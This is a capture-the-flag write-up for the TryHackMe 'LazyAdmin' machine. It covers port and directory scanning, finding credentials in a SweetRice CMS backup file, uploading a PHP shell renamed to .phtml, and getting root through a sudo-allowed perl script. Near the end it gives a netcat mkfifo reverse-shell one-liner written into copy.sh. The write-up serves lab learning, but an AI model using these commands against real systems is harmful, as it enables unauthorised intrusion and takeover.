LazyAdmin — TryHackMe — Writeup

Hello. I’m Rahmos. Here is my LazyAdmin — TryHackMe — Writeup. Check it out!

First deploy the machine and nmap to scan opened ports.

nmap -Pn -v -T5 <ip>

nmap

We see there are 2 ports opening: 22 (ssh) and 80 (http). Let’s access its website.

Website

It’s a Apache web server. Now use Gobuster to look for hidden dirs.

gobuster dir -u http://<ip>:80 -w /path-to-wordlist

gobuster

I see a /content dir. So let’s access http://<ip>/content

/content

The website is running under SweetRice. So the login page is http://<ip>/content/as?type=sign

Login Page

However, now we don’t have the credential to login. So we will find another way.

Let’s bruteforce hidden dir at http://<ip>/content

gobuster dir http://<ip>/content -w /path-to-wordlist

gobuster

Try to access all the hidden dirs, and i’ve found some interesting file in /inc

/inc

It’s a mysql backup file, so access this folder and download the backup file using wget.

Here i found the credential for login:

Credential

The password is a MD5 hash. So let’s use a md5 decrypt online and i found the password.

Password

Now login!

We are in the admin page. Now let’s try to upload our shell.

Navigate to Media -> Upload. I’ve tried to upload the .php shell, but the web refused this extension. So change .php to .phtml and upload.

Upload

Now start a listener on our machine and now we’ve got our shell.

nc -lvnp <port>

Shell

cd to /home and cat our first Flag.

First flag

Now let’s try to get root. We’re gonna spawn a tty using this python script:

python -c ‘import pty; pty.spawn(“/bin/bash”)’

then sudo -l to check which command we can use as root

sudo -l

Well we can run Perl and the file backup.pl without password. Let’s check content of backup.pl

backup.pl

It will spawn a shell and execute copy.sh from /etc. So let’s see what is inside copy.sh

copy.sh

Well, it will spawn a reverse shell for us! So just change the ip and port which matches our machine and exec this copy.sh. I’m using echo to change this.

echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> port >/tmp/f”

Now we’ve change the content of copy.sh. Start a listener in our machine and execute the backup.pl file.

sudo /usr/bin/perl /home/itguy/backup.pl

Return to our listener and we are root now!

root

Now get our root flag!

root.txt

The end.

HAPPY HACKING